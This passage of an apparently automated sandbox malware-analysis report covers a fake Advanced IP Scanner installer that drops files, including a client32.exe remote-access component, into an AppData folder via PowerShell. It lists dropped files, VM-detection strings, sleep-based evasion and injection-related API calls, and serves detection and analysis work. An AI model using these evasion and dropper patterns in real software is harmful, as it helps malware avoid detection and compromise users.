Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-sysinfo-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l2-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-datetime-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-4U5GH.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-convert-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-filesystem-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-util-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-conio-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-6H7V6.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-F5QT3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-2-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-1.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-NB2QQ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-Q62S4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\vcruntime140.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-localization-l1-2-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-012CR.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_console.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-QAKOH.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-FOUIF.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-heap-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-5BNS6.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\msvcp140.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-FNUE4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-interlocked-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-runtime-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-0.dll (copy)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SystemUtil\HTCTL32.DLL
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-rtlsupport-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-HA61E.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-5JUJC.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-5C3J6.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-BPHN2.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-multibyte-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\printsupport\is-F8M60.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-math-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-environment-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-TE3AT.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-ET38G.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-timezone-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-string-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-2-0.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-heap-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-UCVS8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-L3ANO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\platforms\is-1PGBC.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-AQQBN.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processenvironment-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-MR0EO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-JOPC8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-14FKM.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-2D48T.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-errorhandling-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-P2PON.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\libeay32.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-profile-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-0LL3Q.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\platforms\qwindows.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-495HA.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-DMJVK.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-IK3SG.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-DLE8L.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-593G3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-5KHP2.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-FLT6F.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SystemUtil\TCCTL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SystemUtil\AudioCapture.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-V71S3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-DORH9.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-QVRL0.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-9GMK5.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-RT7U6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision	graph_7-96998
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision	graph_7-99906
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision	graph_7-99998
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision	graph_7-100186
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision	graph_7-100234
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_7-96940
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	API coverage: 5.7 %
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	API coverage: 2.8 %
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_685A4F30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2044	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe TID: 3300	Thread sleep time: -819750s >= -30000s
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe TID: 7012	Thread sleep time: -42800s >= -30000s
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe TID: 3300	Thread sleep time: -1244750s >= -30000s
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_685A3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 685A3226h
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_6882CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_68830B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	Binary or memory string: VMware
Source: client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla]h*
Source: powershell.exe, 00000003.00000002.1945029113.0000000006FB9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: client32.exe, 00000008.00000003.2034068400.00000000004FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
Source: KC0uZWwr8p.tmp, 00000001.00000003.1994862774.0000000001467000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}og>K
Source: client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: KC0uZWwr8p.tmp, 00000001.00000003.1994862774.0000000001467000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
